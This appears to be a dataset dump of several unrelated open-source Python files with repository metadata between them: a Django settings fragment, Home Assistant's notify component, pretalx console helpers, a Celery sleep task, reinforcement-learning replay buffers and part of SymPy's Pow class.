"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
WSGI_APPLICATION = "config.wsgi.application"
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": BASE_DIR / "db.sqlite3",
}
}
AUTH_USER_MODEL = "account.User"
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = "/static/"
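# Illustration only (not part of the original settings): django-environ can
# also parse list- and URL-style variables, e.g.
#
# ALLOWED_HOSTS = env.list("DJANGO_ALLOWED_HOSTS", default=["localhost"])
# DATABASES = {"default": env.db("DATABASE_URL", default="sqlite:///db.sqlite3")}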
| 25.061069
| 91
| 0.697228
|
1c17d1a795ad8df50e9817d4e3cd96d147ea8e45
| 6,313
|
py
|
Python
|
homeassistant/components/notify/__init__.py
|
EmitKiwi/home-assistant
|
0999e2ddc476f4bddf710005168b082f03a7cdc0
|
[
"Apache-2.0"
] | 4
|
2019-05-14T20:33:43.000Z
|
2021-09-25T14:56:08.000Z
|
homeassistant/components/notify/__init__.py
|
EmitKiwi/home-assistant
|
0999e2ddc476f4bddf710005168b082f03a7cdc0
|
[
"Apache-2.0"
] | null | null | null |
homeassistant/components/notify/__init__.py
|
EmitKiwi/home-assistant
|
0999e2ddc476f4bddf710005168b082f03a7cdc0
|
[
"Apache-2.0"
] | null | null | null |
"""
Provides functionality to notify people.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/notify/
"""
import asyncio
import logging
import os
from functools import partial
import voluptuous as vol
from homeassistant.setup import async_prepare_setup_platform
from homeassistant.exceptions import HomeAssistantError
from homeassistant.loader import bind_hass
import homeassistant.helpers.config_validation as cv
from homeassistant.config import load_yaml_config_file
from homeassistant.const import CONF_NAME, CONF_PLATFORM
from homeassistant.helpers import config_per_platform, discovery
from homeassistant.util import slugify
_LOGGER = logging.getLogger(__name__)
# Platform specific data
ATTR_DATA = 'data'
# Text to notify user of
ATTR_MESSAGE = 'message'
# Target of the notification (user, device, etc)
ATTR_TARGET = 'target'
# Title of notification
ATTR_TITLE = 'title'
ATTR_TITLE_DEFAULT = "Home Assistant"
DOMAIN = 'notify'
SERVICE_NOTIFY = 'notify'
PLATFORM_SCHEMA = vol.Schema({
vol.Required(CONF_PLATFORM): cv.string,
vol.Optional(CONF_NAME): cv.string,
}, extra=vol.ALLOW_EXTRA)
NOTIFY_SERVICE_SCHEMA = vol.Schema({
vol.Required(ATTR_MESSAGE): cv.template,
vol.Optional(ATTR_TITLE): cv.template,
vol.Optional(ATTR_TARGET): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(ATTR_DATA): dict,
})
@bind_hass
def send_message(hass, message, title=None, data=None):
"""Send a notification message."""
info = {
ATTR_MESSAGE: message
}
if title is not None:
info[ATTR_TITLE] = title
if data is not None:
info[ATTR_DATA] = data
hass.services.call(DOMAIN, SERVICE_NOTIFY, info)
@asyncio.coroutine
def async_setup(hass, config):
"""Set up the notify services."""
descriptions = yield from hass.async_add_job(
load_yaml_config_file,
os.path.join(os.path.dirname(__file__), 'services.yaml'))
targets = {}
@asyncio.coroutine
def async_setup_platform(p_type, p_config=None, discovery_info=None):
"""Set up a notify platform."""
if p_config is None:
p_config = {}
if discovery_info is None:
discovery_info = {}
platform = yield from async_prepare_setup_platform(
hass, config, DOMAIN, p_type)
if platform is None:
_LOGGER.error("Unknown notification service specified")
return
_LOGGER.info("Setting up %s.%s", DOMAIN, p_type)
notify_service = None
try:
if hasattr(platform, 'async_get_service'):
notify_service = yield from \
platform.async_get_service(hass, p_config, discovery_info)
elif hasattr(platform, 'get_service'):
notify_service = yield from hass.async_add_job(
platform.get_service, hass, p_config, discovery_info)
else:
raise HomeAssistantError("Invalid notify platform.")
if notify_service is None:
_LOGGER.error(
"Failed to initialize notification service %s", p_type)
return
except Exception: # pylint: disable=broad-except
_LOGGER.exception('Error setting up platform %s', p_type)
return
notify_service.hass = hass
@asyncio.coroutine
def async_notify_message(service):
"""Handle sending notification message service calls."""
kwargs = {}
message = service.data[ATTR_MESSAGE]
title = service.data.get(ATTR_TITLE)
if title:
title.hass = hass
kwargs[ATTR_TITLE] = title.async_render()
if targets.get(service.service) is not None:
kwargs[ATTR_TARGET] = [targets[service.service]]
elif service.data.get(ATTR_TARGET) is not None:
kwargs[ATTR_TARGET] = service.data.get(ATTR_TARGET)
message.hass = hass
kwargs[ATTR_MESSAGE] = message.async_render()
kwargs[ATTR_DATA] = service.data.get(ATTR_DATA)
yield from notify_service.async_send_message(**kwargs)
if hasattr(notify_service, 'targets'):
platform_name = (
p_config.get(CONF_NAME) or discovery_info.get(CONF_NAME) or
p_type)
for name, target in notify_service.targets.items():
target_name = slugify('{}_{}'.format(platform_name, name))
targets[target_name] = target
hass.services.async_register(
DOMAIN, target_name, async_notify_message,
descriptions.get(SERVICE_NOTIFY),
schema=NOTIFY_SERVICE_SCHEMA)
platform_name = (
p_config.get(CONF_NAME) or discovery_info.get(CONF_NAME) or
SERVICE_NOTIFY)
platform_name_slug = slugify(platform_name)
hass.services.async_register(
DOMAIN, platform_name_slug, async_notify_message,
descriptions.get(SERVICE_NOTIFY), schema=NOTIFY_SERVICE_SCHEMA)
return True
setup_tasks = [async_setup_platform(p_type, p_config) for p_type, p_config
in config_per_platform(config, DOMAIN)]
if setup_tasks:
yield from asyncio.wait(setup_tasks, loop=hass.loop)
@asyncio.coroutine
def async_platform_discovered(platform, info):
"""Handle for discovered platform."""
yield from async_setup_platform(platform, discovery_info=info)
discovery.async_listen_platform(hass, DOMAIN, async_platform_discovered)
return True
class BaseNotificationService(object):
"""An abstract class for notification services."""
hass = None
def send_message(self, message, **kwargs):
"""Send a message.
kwargs can contain ATTR_TITLE to specify a title.
"""
raise NotImplementedError()
def async_send_message(self, message, **kwargs):
"""Send a message.
kwargs can contain ATTR_TITLE to specify a title.
This method must be run in the event loop and returns a coroutine.
"""
return self.hass.async_add_job(
partial(self.send_message, message, **kwargs))
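# Minimal platform sketch, for illustration only: a notify platform module just
# needs a get_service() factory returning a BaseNotificationService subclass,
# which is exactly what async_setup_platform() above looks for. The module path
# and logging behaviour below are hypothetical.
#
# # <config>/custom_components/notify/demo_log.py
# import logging
#
# from homeassistant.components.notify import BaseNotificationService
#
# _LOGGER = logging.getLogger(__name__)
#
#
# def get_service(hass, config, discovery_info=None):
#     return DemoLogNotificationService()
#
#
# class DemoLogNotificationService(BaseNotificationService):
#     def send_message(self, message, **kwargs):
#         _LOGGER.info("notify: %s (title=%s)", message, kwargs.get("title"))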
| 31.723618
| 78
| 0.656423
|
3a3a8e1dc760993c607735e7aad62a78c98bba42
| 1,583
|
py
|
Python
|
src/pretalx/common/console.py
|
Hydro2shine/sprout
|
7dfa5e9fa0a7ef9157517ad0752e393599053873
|
[
"Apache-2.0"
] | null | null | null |
src/pretalx/common/console.py
|
Hydro2shine/sprout
|
7dfa5e9fa0a7ef9157517ad0752e393599053873
|
[
"Apache-2.0"
] | null | null | null |
src/pretalx/common/console.py
|
Hydro2shine/sprout
|
7dfa5e9fa0a7ef9157517ad0752e393599053873
|
[
"Apache-2.0"
] | null | null | null |
BOLD = '\033[1m'
RESET = '\033[0m'
UD = '│'
LR = '─'
SEPARATORS = {
(False, True, True, False): '┬',
(True, False, False, True): '┴',
(False, False, True, True): '┤',
(True, True, False, False): '├',
(False, True, False, True): '┼',
(True, False, True, False): '┼',
}
def get_seperator(*args):
"""(upright, downright, downleft, upleft): Tuple[bool] -> seperator: str"""
if sum(args) >= 3:
return '┼'
elif sum(args) == 1:
return ('└', '┌', '┐', '┘')[args.index(True)]
return SEPARATORS[tuple(args)]
def start_box(size):
try:
print('┏' + '━' * size + '┓')
except (UnicodeDecodeError, UnicodeEncodeError):
print('-' * (size + 2))
def end_box(size):
try:
print('┗' + '━' * size + '┛')
except (UnicodeDecodeError, UnicodeEncodeError):
print('-' * (size + 2))
def print_line(string, box=False, bold=False, color=None, size=None):
text_length = len(string)
alt_string = string
if bold:
string = f'{BOLD}{string}{RESET}'
if color:
string = f'{color}{string}{RESET}'
if box:
if size:
if text_length + 2 < size:
string += ' ' * (size - text_length - 2)
alt_string += ' ' * (size - text_length - 2)
string = f'┃ {string} ┃'
        alt_string = f'| {alt_string} |'
try:
print(string)
except (UnicodeDecodeError, UnicodeEncodeError):
try:
print(alt_string)
except (UnicodeDecodeError, UnicodeEncodeError):
print('unprintable setting')
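if __name__ == '__main__':
    # Tiny demo, for illustration only: draw a 40-character wide box with the
    # helpers above.
    width = 40
    start_box(width)
    print_line('pretalx console helpers', box=True, bold=True, size=width)
    print_line('plain line inside the box', box=True, size=width)
    end_box(width)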
| 26.830508
| 79
| 0.527479
|
5e5aef57289562fa0af368906ed3a5a45c46f647
| 24
|
py
|
Python
|
__init__.py
|
poloarol/pathway-finder
|
a43616f581079b065074b5ecf9d20b725fee9ea3
|
[
"MIT"
] | 1
|
2019-06-06T19:51:14.000Z
|
2019-06-06T19:51:14.000Z
|
__init__.py
|
poloarol/pathway-finder
|
a43616f581079b065074b5ecf9d20b725fee9ea3
|
[
"MIT"
] | 1
|
2019-06-13T19:40:23.000Z
|
2019-06-13T19:40:23.000Z
|
__init__.py
|
poloarol/pathway-finder
|
a43616f581079b065074b5ecf9d20b725fee9ea3
|
[
"MIT"
] | null | null | null |
name = 'pathway_finder'
| 12
| 23
| 0.75
|
925dd4e07d2bb09b1faa2fff4046a7ac8f15cafd
| 282
|
py
|
Python
|
tornado/sleep_task.py
|
dongweiming/speakerdeck
|
497352767a6ec57629f28d5c85f70bef38fc1914
|
[
"Apache-2.0"
] | 6
|
2015-03-02T06:01:28.000Z
|
2016-06-03T09:55:34.000Z
|
tornado/sleep_task.py
|
dongweiming/speakerdeck
|
497352767a6ec57629f28d5c85f70bef38fc1914
|
[
"Apache-2.0"
] | null | null | null |
tornado/sleep_task.py
|
dongweiming/speakerdeck
|
497352767a6ec57629f28d5c85f70bef38fc1914
|
[
"Apache-2.0"
] | 5
|
2015-02-01T13:48:58.000Z
|
2018-11-27T02:10:59.000Z
|
import time
from celery import Celery
celery = Celery("tasks", broker="amqp://guest:guest@localhost:5672")
celery.conf.CELERY_RESULT_BACKEND = "amqp"
@celery.task
def sleep(seconds):
time.sleep(float(seconds))
return seconds
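# Illustration only: from the Tornado side this task is normally enqueued
# asynchronously, e.g. (hypothetical caller code):
#
# result = sleep.delay(3)          # returns an AsyncResult immediately
# print(result.get(timeout=10))    # blocks until the worker replies via amqp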
if __name__ == "__main__":
celery.start()
| 20.142857
| 68
| 0.72695
|
28685d31a768bbb31f2a2ef1fc5e4ba87c4c8dbf
| 2,398
|
py
|
Python
|
src/replaybuffer.py
|
sheelabhadra/Learning2Drive
|
f93cb5651c08b87b66b3f2ffc8a3512a9af73db4
|
[
"MIT"
] | 6
|
2020-04-09T01:58:07.000Z
|
2021-12-10T23:24:13.000Z
|
src/replaybuffer.py
|
sheelabhadra/Learning2Drive
|
f93cb5651c08b87b66b3f2ffc8a3512a9af73db4
|
[
"MIT"
] | 7
|
2019-12-28T07:26:43.000Z
|
2022-03-30T21:01:59.000Z
|
src/replaybuffer.py
|
sheelabhadra/Learning2Drive
|
f93cb5651c08b87b66b3f2ffc8a3512a9af73db4
|
[
"MIT"
] | 2
|
2020-07-08T08:01:48.000Z
|
2022-01-06T06:05:43.000Z
|
"""
Data structure for implementing experience replay
"""
from collections import deque, namedtuple
import random
import numpy as np
Transition = namedtuple('Transition', ['state', 'action', 'reward', 'terminal', 'next_state'])
class ReplayBuffer(object):
def __init__(self, buffer_size, random_seed=1234):
self.buffer_size = buffer_size
self.count = 0
# Right side of deque contains newest experience
self.buffer = deque()
random.seed(random_seed)
def add(self, state, action, reward, terminal, next_state):
experience = Transition(state, action, reward, terminal, next_state)
if self.count < self.buffer_size:
self.buffer.append(experience)
self.count += 1
else:
self.buffer.popleft()
self.buffer.append(experience)
def size(self):
return self.count
def sample_batch(self, batch_size):
batch = []
if self.count < batch_size:
batch = random.sample(self.buffer, self.count)
else:
batch = random.sample(self.buffer, batch_size)
return map(np.array, zip(*batch))
def clear(self):
self.buffer.clear()
self.count = 0
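# Quick usage sketch (illustrative only, not in the original module): fill the
# buffer with dummy transitions and draw a mini-batch.
def _example_replay_usage():
    buf = ReplayBuffer(buffer_size=100)
    for _ in range(10):
        buf.add(np.zeros(4), action=0, reward=1.0, terminal=False,
                next_state=np.ones(4))
    states, actions, rewards, terminals, next_states = buf.sample_batch(4)
    return states.shape, rewards.mean()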
class ReplayBuffer2(object):
def __init__(self, buffer_size, random_seed=1234):
self.buffer_size = buffer_size
self.count_positive = 0
self.count_negative = 0
self.buffer_positive = deque()
self.buffer_negative = deque()
random.seed(random_seed)
def add(self, state, action, reward, terminal, next_state):
experience = Transition(state, action, reward, terminal, next_state)
if reward >= 0:
if self.count_positive < self.buffer_size:
self.buffer_positive.append(experience)
self.count_positive += 1
else:
self.buffer_positive.popleft()
self.buffer_positive.append(experience)
else:
if self.count_negative < self.buffer_size:
self.buffer_negative.append(experience)
self.count_negative += 1
else:
self.buffer_negative.popleft()
self.buffer_negative.append(experience)
def size(self):
return self.count_negative + self.count_positive
def sample_batch(self, batch_size):
batch = []
| 31.142857
| 94
| 0.618015
|
1ff7cb94cb612116d0a7da5825f51c5bb086c3e6
| 65,783
|
py
|
Python
|
sympy/core/power.py
|
shubhsherl/sympy
|
b4f1aa3540fe68d078d76e78ba59d022dd6df39f
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/core/power.py
|
shubhsherl/sympy
|
b4f1aa3540fe68d078d76e78ba59d022dd6df39f
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/core/power.py
|
shubhsherl/sympy
|
b4f1aa3540fe68d078d76e78ba59d022dd6df39f
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import print_function, division
from math import log as _log
from .sympify import _sympify
from .cache import cacheit
from .singleton import S
from .expr import Expr
from .evalf import PrecisionExhausted
from .function import (_coeff_isneg, expand_complex, expand_multinomial,
expand_mul)
from .logic import fuzzy_bool, fuzzy_not, fuzzy_and
from .compatibility import as_int, range
from .parameters import global_parameters
from sympy.utilities.iterables import sift
from mpmath.libmp import sqrtrem as mpmath_sqrtrem
from math import sqrt as _sqrt
def isqrt(n):
"""Return the largest integer less than or equal to sqrt(n)."""
if n < 0:
raise ValueError("n must be nonnegative")
n = int(n)
# Fast path: with IEEE 754 binary64 floats and a correctly-rounded
# math.sqrt, int(math.sqrt(n)) works for any integer n satisfying 0 <= n <
# 4503599761588224 = 2**52 + 2**27. But Python doesn't guarantee either
# IEEE 754 format floats *or* correct rounding of math.sqrt, so check the
# answer and fall back to the slow method if necessary.
if n < 4503599761588224:
s = int(_sqrt(n))
if 0 <= n - s*s <= 2*s:
return s
return integer_nthroot(n, 2)[0]
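# For instance, isqrt(24) == 4 and isqrt(25) == 5; inputs at or beyond the
# 2**52 + 2**27 threshold skip the float fast path and fall back to integer_nthroot.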
def integer_nthroot(y, n):
"""
Return a tuple containing x = floor(y**(1/n))
and a boolean indicating whether the result is exact (that is,
whether x**n == y).
Examples
========
>>> from sympy import integer_nthroot
>>> integer_nthroot(16, 2)
(4, True)
>>> integer_nthroot(26, 2)
(5, False)
To simply determine if a number is a perfect square, the is_square
function should be used:
>>> from sympy.ntheory.primetest import is_square
>>> is_square(26)
False
See Also
========
sympy.ntheory.primetest.is_square
integer_log
"""
y, n = as_int(y), as_int(n)
if y < 0:
raise ValueError("y must be nonnegative")
if n < 1:
raise ValueError("n must be positive")
if y in (0, 1):
return y, True
if n == 1:
return y, True
if n == 2:
x, rem = mpmath_sqrtrem(y)
return int(x), not rem
if n > y:
return 1, False
# Get initial estimate for Newton's method. Care must be taken to
# avoid overflow
try:
guess = int(y**(1./n) + 0.5)
except OverflowError:
exp = _log(y, 2)/n
if exp > 53:
shift = int(exp - 53)
guess = int(2.0**(exp - shift) + 1) << shift
else:
guess = int(2.0**exp)
if guess > 2**50:
# Newton iteration
xprev, x = -1, guess
while 1:
t = x**(n - 1)
xprev, x = x, ((n - 1)*x + y//t)//n
if abs(x - xprev) < 2:
break
else:
x = guess
# Compensate
t = x**n
while t < y:
x += 1
t = x**n
while t > y:
x -= 1
t = x**n
return int(x), t == y # int converts long to int if possible
def integer_log(y, x):
r"""
Returns ``(e, bool)`` where e is the largest nonnegative integer
such that :math:`|y| \geq |x^e|` and ``bool`` is True if :math:`y = x^e`.
Examples
========
>>> from sympy import integer_log
>>> integer_log(125, 5)
(3, True)
>>> integer_log(17, 9)
(1, False)
>>> integer_log(4, -2)
(2, True)
>>> integer_log(-125,-5)
(3, True)
See Also
========
integer_nthroot
sympy.ntheory.primetest.is_square
sympy.ntheory.factor_.multiplicity
sympy.ntheory.factor_.perfect_power
"""
if x == 1:
raise ValueError('x cannot take value as 1')
if y == 0:
raise ValueError('y cannot take value as 0')
if x in (-2, 2):
x = int(x)
y = as_int(y)
e = y.bit_length() - 1
return e, x**e == y
if x < 0:
n, b = integer_log(y if y > 0 else -y, -x)
return n, b and bool(n % 2 if y < 0 else not n % 2)
x = as_int(x)
y = as_int(y)
r = e = 0
while y >= x:
d = x
m = 1
while y >= d:
y, rem = divmod(y, d)
r = r or rem
e += m
if y > d:
d *= d
m *= 2
return e, r == 0 and y == 1
class Pow(Expr):
"""
Defines the expression x**y as "x raised to a power y"
Singleton definitions involving (0, 1, -1, oo, -oo, I, -I):
+--------------+---------+-----------------------------------------------+
| expr | value | reason |
+==============+=========+===============================================+
| z**0 | 1 | Although arguments over 0**0 exist, see [2]. |
+--------------+---------+-----------------------------------------------+
| z**1 | z | |
+--------------+---------+-----------------------------------------------+
| (-oo)**(-1) | 0 | |
+--------------+---------+-----------------------------------------------+
| (-1)**-1 | -1 | |
+--------------+---------+-----------------------------------------------+
| S.Zero**-1 | zoo | This is not strictly true, as 0**-1 may be |
| | | undefined, but is convenient in some contexts |
| | | where the base is assumed to be positive. |
+--------------+---------+-----------------------------------------------+
| 1**-1 | 1 | |
+--------------+---------+-----------------------------------------------+
| oo**-1 | 0 | |
+--------------+---------+-----------------------------------------------+
| 0**oo | 0 | Because for all complex numbers z near |
| | | 0, z**oo -> 0. |
+--------------+---------+-----------------------------------------------+
| 0**-oo | zoo | This is not strictly true, as 0**oo may be |
| | | oscillating between positive and negative |
| | | values or rotating in the complex plane. |
| | | It is convenient, however, when the base |
| | | is positive. |
+--------------+---------+-----------------------------------------------+
| 1**oo | nan | Because there are various cases where |
| 1**-oo | | lim(x(t),t)=1, lim(y(t),t)=oo (or -oo), |
| | | but lim( x(t)**y(t), t) != 1. See [3]. |
+--------------+---------+-----------------------------------------------+
| b**zoo | nan | Because b**z has no limit as z -> zoo |
+--------------+---------+-----------------------------------------------+
| (-1)**oo | nan | Because of oscillations in the limit. |
| (-1)**(-oo) | | |
+--------------+---------+-----------------------------------------------+
| oo**oo | oo | |
+--------------+---------+-----------------------------------------------+
| oo**-oo | 0 | |
+--------------+---------+-----------------------------------------------+
| (-oo)**oo | nan | |
| (-oo)**-oo | | |
+--------------+---------+-----------------------------------------------+
| oo**I | nan | oo**e could probably be best thought of as |
| (-oo)**I | | the limit of x**e for real x as x tends to |
| | | oo. If e is I, then the limit does not exist |
| | | and nan is used to indicate that. |
+--------------+---------+-----------------------------------------------+
| oo**(1+I) | zoo | If the real part of e is positive, then the |
| (-oo)**(1+I) | | limit of abs(x**e) is oo. So the limit value |
| | | is zoo. |
+--------------+---------+-----------------------------------------------+
| oo**(-1+I) | 0 | If the real part of e is negative, then the |
| -oo**(-1+I) | | limit is 0. |
+--------------+---------+-----------------------------------------------+
Because symbolic computations are more flexible than floating point
calculations and we prefer to never return an incorrect answer,
we choose not to conform to all IEEE 754 conventions. This helps
us avoid extra test-case code in the calculation of limits.
See Also
========
sympy.core.numbers.Infinity
sympy.core.numbers.NegativeInfinity
sympy.core.numbers.NaN
References
==========
.. [1] https://en.wikipedia.org/wiki/Exponentiation
.. [2] https://en.wikipedia.org/wiki/Exponentiation#Zero_to_the_power_of_zero
.. [3] https://en.wikipedia.org/wiki/Indeterminate_forms
"""
is_Pow = True
__slots__ = ['is_commutative']
@cacheit
def __new__(cls, b, e, evaluate=None):
if evaluate is None:
evaluate = global_parameters.evaluate
from sympy.functions.elementary.exponential import exp_polar
b = _sympify(b)
e = _sympify(e)
# XXX: Maybe only Expr should be allowed...
from sympy.core.relational import Relational
if isinstance(b, Relational) or isinstance(e, Relational):
raise TypeError('Relational can not be used in Pow')
if evaluate:
if e is S.ComplexInfinity:
return S.NaN
if e is S.Zero:
return S.One
elif e is S.One:
return b
elif e == -1 and not b:
return S.ComplexInfinity
# Only perform autosimplification if exponent or base is a Symbol or number
elif (b.is_Symbol or b.is_number) and (e.is_Symbol or e.is_number) and\
e.is_integer and _coeff_isneg(b):
if e.is_even:
b = -b
elif e.is_odd:
return -Pow(-b, e)
if S.NaN in (b, e): # XXX S.NaN**x -> S.NaN under assumption that x != 0
return S.NaN
elif b is S.One:
if abs(e).is_infinite:
return S.NaN
return S.One
else:
# recognize base as E
if not e.is_Atom and b is not S.Exp1 and not isinstance(b, exp_polar):
from sympy import numer, denom, log, sign, im, factor_terms
c, ex = factor_terms(e, sign=False).as_coeff_Mul()
den = denom(ex)
if isinstance(den, log) and den.args[0] == b:
return S.Exp1**(c*numer(ex))
elif den.is_Add:
s = sign(im(b))
if s.is_Number and s and den == \
log(-factor_terms(b, sign=False)) + s*S.ImaginaryUnit*S.Pi:
return S.Exp1**(c*numer(ex))
obj = b._eval_power(e)
if obj is not None:
return obj
obj = Expr.__new__(cls, b, e)
obj = cls._exec_constructor_postprocessors(obj)
if not isinstance(obj, Pow):
return obj
obj.is_commutative = (b.is_commutative and e.is_commutative)
return obj
@property
def base(self):
return self._args[0]
@property
def exp(self):
return self._args[1]
@classmethod
def class_key(cls):
return 3, 2, cls.__name__
def _eval_refine(self, assumptions):
from sympy.assumptions.ask import ask, Q
b, e = self.as_base_exp()
if ask(Q.integer(e), assumptions) and _coeff_isneg(b):
if ask(Q.even(e), assumptions):
return Pow(-b, e)
elif ask(Q.odd(e), assumptions):
return -Pow(-b, e)
def _eval_power(self, other):
from sympy import Abs, arg, exp, floor, im, log, re, sign
b, e = self.as_base_exp()
if b is S.NaN:
return (b**e)**other # let __new__ handle it
s = None
if other.is_integer:
s = 1
elif b.is_polar: # e.g. exp_polar, besselj, var('p', polar=True)...
s = 1
elif e.is_extended_real is not None:
# helper functions ===========================
def _half(e):
"""Return True if the exponent has a literal 2 as the
denominator, else None."""
if getattr(e, 'q', None) == 2:
return True
n, d = e.as_numer_denom()
if n.is_integer and d == 2:
return True
def _n2(e):
"""Return ``e`` evaluated to a Number with 2 significant
digits, else None."""
try:
rv = e.evalf(2, strict=True)
if rv.is_Number:
return rv
except PrecisionExhausted:
pass
# ===================================================
if e.is_extended_real:
# we need _half(other) with constant floor or
# floor(S.Half - e*arg(b)/2/pi) == 0
# handle -1 as special case
if e == -1:
# floor arg. is 1/2 + arg(b)/2/pi
if _half(other):
if b.is_negative is True:
return S.NegativeOne**other*Pow(-b, e*other)
if b.is_extended_real is False:
return Pow(b.conjugate()/Abs(b)**2, other)
elif e.is_even:
if b.is_extended_real:
b = abs(b)
if b.is_imaginary:
b = abs(im(b))*S.ImaginaryUnit
if (abs(e) < 1) == True or e == 1:
s = 1 # floor = 0
elif b.is_extended_nonnegative:
s = 1 # floor = 0
elif re(b).is_extended_nonnegative and (abs(e) < 2) == True:
s = 1 # floor = 0
elif fuzzy_not(im(b).is_zero) and abs(e) == 2:
s = 1 # floor = 0
elif _half(other):
s = exp(2*S.Pi*S.ImaginaryUnit*other*floor(
S.Half - e*arg(b)/(2*S.Pi)))
if s.is_extended_real and _n2(sign(s) - s) == 0:
s = sign(s)
else:
s = None
else:
# e.is_extended_real is False requires:
# _half(other) with constant floor or
# floor(S.Half - im(e*log(b))/2/pi) == 0
try:
s = exp(2*S.ImaginaryUnit*S.Pi*other*
floor(S.Half - im(e*log(b))/2/S.Pi))
# be careful to test that s is -1 or 1 b/c sign(I) == I:
# so check that s is real
if s.is_extended_real and _n2(sign(s) - s) == 0:
s = sign(s)
else:
s = None
except PrecisionExhausted:
s = None
if s is not None:
return s*Pow(b, e*other)
def _eval_Mod(self, q):
r"""A dispatched function to compute `b^e \bmod q`, dispatched
by ``Mod``.
Notes
=====
Algorithms:
1. For unevaluated integer power, use built-in ``pow`` function
with 3 arguments, if powers are not too large wrt base.
2. For very large powers, use totient reduction if e >= lg(m).
The bound on m keeps factorization memory-safe, i.e. about m^(1/4).
A check that lg(e) > m^(1/4) is added so that Pollard's rho is
faster than the built-in pow.
3. For any unevaluated power found in `b` or `e`, step 2 is applied
recursively to the base and the exponent, so that `b \bmod q`
becomes the new base and ``\phi(q) + e \bmod \phi(q)`` becomes the
new exponent; the reduced expression is then computed.
"""
from sympy.ntheory import totient
from .mod import Mod
base, exp = self.base, self.exp
if exp.is_integer and exp.is_positive:
if q.is_integer and base % q == 0:
return S.Zero
if base.is_Integer and exp.is_Integer and q.is_Integer:
b, e, m = int(base), int(exp), int(q)
mb = m.bit_length()
if mb <= 80 and e >= mb and e.bit_length()**4 >= m:
phi = totient(m)
return Integer(pow(b, phi + e%phi, m))
return Integer(pow(b, e, m))
if isinstance(base, Pow) and base.is_integer and base.is_number:
base = Mod(base, q)
return Mod(Pow(base, exp, evaluate=False), q)
if isinstance(exp, Pow) and exp.is_integer and exp.is_number:
bit_length = int(q).bit_length()
# XXX Mod-Pow actually attempts to do a hanging evaluation
# if this dispatched function returns None.
# May need some fixes in the dispatcher itself.
if bit_length <= 80:
phi = totient(q)
exp = phi + Mod(exp, phi)
return Mod(Pow(base, exp, evaluate=False), q)
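# Illustrative use through the public Mod interface (values chosen for the example;
# the unevaluated Pow keeps the huge power from ever being formed):
#     >>> from sympy import Mod, Pow
#     >>> Mod(Pow(3, 10**9, evaluate=False), 7)   # exponent reduced via totient(7)
#     4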
def _eval_is_even(self):
if self.exp.is_integer and self.exp.is_positive:
return self.base.is_even
def _eval_is_negative(self):
ext_neg = Pow._eval_is_extended_negative(self)
if ext_neg is True:
return self.is_finite
return ext_neg
def _eval_is_positive(self):
ext_pos = Pow._eval_is_extended_positive(self)
if ext_pos is True:
return self.is_finite
return ext_pos
def _eval_is_extended_positive(self):
from sympy import log
if self.base == self.exp:
if self.base.is_extended_nonnegative:
return True
elif self.base.is_positive:
if self.exp.is_extended_real:
return True
elif self.base.is_extended_negative:
if self.exp.is_even:
return True
if self.exp.is_odd:
return False
elif self.base.is_zero:
if self.exp.is_extended_real:
return self.exp.is_zero
elif self.base.is_extended_nonpositive:
if self.exp.is_odd:
return False
elif self.base.is_imaginary:
if self.exp.is_integer:
m = self.exp % 4
if m.is_zero:
return True
if m.is_integer and m.is_zero is False:
return False
if self.exp.is_imaginary:
return log(self.base).is_imaginary
def _eval_is_extended_negative(self):
if self.base.is_extended_negative:
if self.exp.is_odd and self.base.is_finite:
return True
if self.exp.is_even:
return False
elif self.base.is_extended_positive:
if self.exp.is_extended_real:
return False
elif self.base.is_zero:
if self.exp.is_extended_real:
return False
elif self.base.is_extended_nonnegative:
if self.exp.is_extended_nonnegative:
return False
elif self.base.is_extended_nonpositive:
if self.exp.is_even:
return False
elif self.base.is_extended_real:
if self.exp.is_even:
return False
def _eval_is_zero(self):
if self.base.is_zero:
if self.exp.is_extended_positive:
return True
elif self.exp.is_extended_nonpositive:
return False
elif self.base.is_zero is False:
if self.exp.is_negative:
return self.base.is_infinite
elif self.exp.is_nonnegative:
return False
elif self.exp.is_infinite:
if (1 - abs(self.base)).is_extended_positive:
return self.exp.is_extended_positive
elif (1 - abs(self.base)).is_extended_negative:
return self.exp.is_extended_negative
else:
# when self.base.is_zero is None
return None
def _eval_is_integer(self):
b, e = self.args
if b.is_rational:
if b.is_integer is False and e.is_positive:
return False # rat**nonneg
if b.is_integer and e.is_integer:
if b is S.NegativeOne:
return True
if e.is_nonnegative or e.is_positive:
return True
if b.is_integer and e.is_negative and (e.is_finite or e.is_integer):
if fuzzy_not((b - 1).is_zero) and fuzzy_not((b + 1).is_zero):
return False
if b.is_Number and e.is_Number:
check = self.func(*self.args)
return check.is_Integer
def _eval_is_extended_real(self):
from sympy import arg, exp, log, Mul
real_b = self.base.is_extended_real
if real_b is None:
if self.base.func == exp and self.base.args[0].is_imaginary:
return self.exp.is_imaginary
return
real_e = self.exp.is_extended_real
if real_e is None:
return
if real_b and real_e:
if self.base.is_extended_positive:
return True
elif self.base.is_extended_nonnegative and self.exp.is_extended_nonnegative:
return True
elif self.exp.is_integer and self.base.is_extended_nonzero:
return True
elif self.exp.is_integer and self.exp.is_nonnegative:
return True
elif self.base.is_extended_negative:
if self.exp.is_Rational:
return False
if real_e and self.exp.is_extended_negative and self.base.is_zero is False:
return Pow(self.base, -self.exp).is_extended_real
